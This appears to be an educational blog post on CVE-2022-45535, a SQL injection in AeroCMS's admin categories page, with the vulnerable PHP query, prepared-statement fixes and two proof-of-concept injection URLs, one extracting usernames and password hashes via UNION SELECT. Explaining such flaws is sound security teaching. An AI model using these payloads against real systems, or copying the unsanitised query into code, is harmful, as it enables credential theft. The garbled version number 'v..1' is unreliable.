AeroCMS is a lightweight, open-source content management system. Like many CMS platforms, it has an admin backend that lets you manage posts, users, and categories. But in late 2022, a serious security flaw was discovered: CVE-2022-45535, a SQL Injection vulnerability in its admin categories page.
In this post, let’s break down what happened, how the exploit works, and include code examples. We’ll keep the language simple for anyone new to web security. By the end, you’ll see how attackers could use this flaw to grab database data—with dangerous consequences.
What's the Problem with AeroCMS v..1?
The vulnerability was found in the /admin/categories.php script. It specifically targets the edit parameter—a variable sent by admins in the URL to edit category entries.
Normally, things like category IDs should be checked carefully before using in a database query. But in this case, AeroCMS did not sanitize (clean up) what was passed in the edit parameter.
Here’s roughly what the vulnerable code inside categories.php looked like
// Get category ID from user input
$edit = $_GET['edit'];
// Build SQL query directly using user input
$sql = "SELECT * FROM categories WHERE id = $edit";
// Run query (unsafe!)
$result = mysqli_query($conn, $sql);
Notice: The value of $edit comes straight from the user, goes straight into SQL, with no safety checks!
How Can Attackers Exploit This?
If an attacker can access the admin section (maybe by guessing weak login credentials or session theft), they can change the edit parameter in the URL to include SQL code.
Say the normal URL to edit a category looks like this
http://example.com/admin/categories.php?edit=1
An attacker could change it to something like
http://example.com/admin/categories.php?edit=1%20OR%201=1
This URL sends
edit=1 OR 1=1
The SQL query becomes
SELECT * FROM categories WHERE id = 1 OR 1=1
So the query now returns all categories, regardless of what id really is
But it gets worse—an attacker could use SQL UNION or subselects to leak data from other tables.
Extract Admin Usernames & Passwords (Proof of Concept)
By adjusting the query, a hacker might try to fetch data from the users table.
Exploit URL
http://example.com/admin/categories.php?edit=1 UNION SELECT 1,username,password FROM users --
Now, the SQL becomes
SELECT * FROM categories WHERE id = 1
UNION
SELECT 1, username, password FROM users --
If the page shows results, hackers may see usernames & hashed passwords from the users table right on the categories page!
Possibly get a foothold for remote code execution
SQL Injection is one of the most dangerous web vulnerabilities because it attacks the heart of your database.
Protecting Against SQL Injection
How should this have been done? The right way is to use prepared statements, which safely separate code and data:
// This is safe with prepared statements
$stmt = $conn->prepare('SELECT * FROM categories WHERE id = ?');
$stmt->bind_param('i', $_GET['edit']);
$stmt->execute();
Or, at the very least, cast $edit to integer type
$edit = intval($_GET['edit']);
But prepared statements are the gold standard for safety.
Official References
- NVD – CVE-2022-45535
- Exploit Database Entry
- GitHub Advisory *(if available)*
Summary
- CVE-2022-45535 affects AeroCMS v..1 via the edit parameter on /admin/categories.php
Protection: always use prepared statements and input validation
If you run AeroCMS, update or patch your installation ASAP!
*This post was written to help admins and new security enthusiasts understand the risks of SQL Injection and how even small code oversights can have big security consequences.*
Timeline
Published on: 11/22/2022 21:15:00 UTC
Last modified on: 11/23/2022 16:01:00 UTC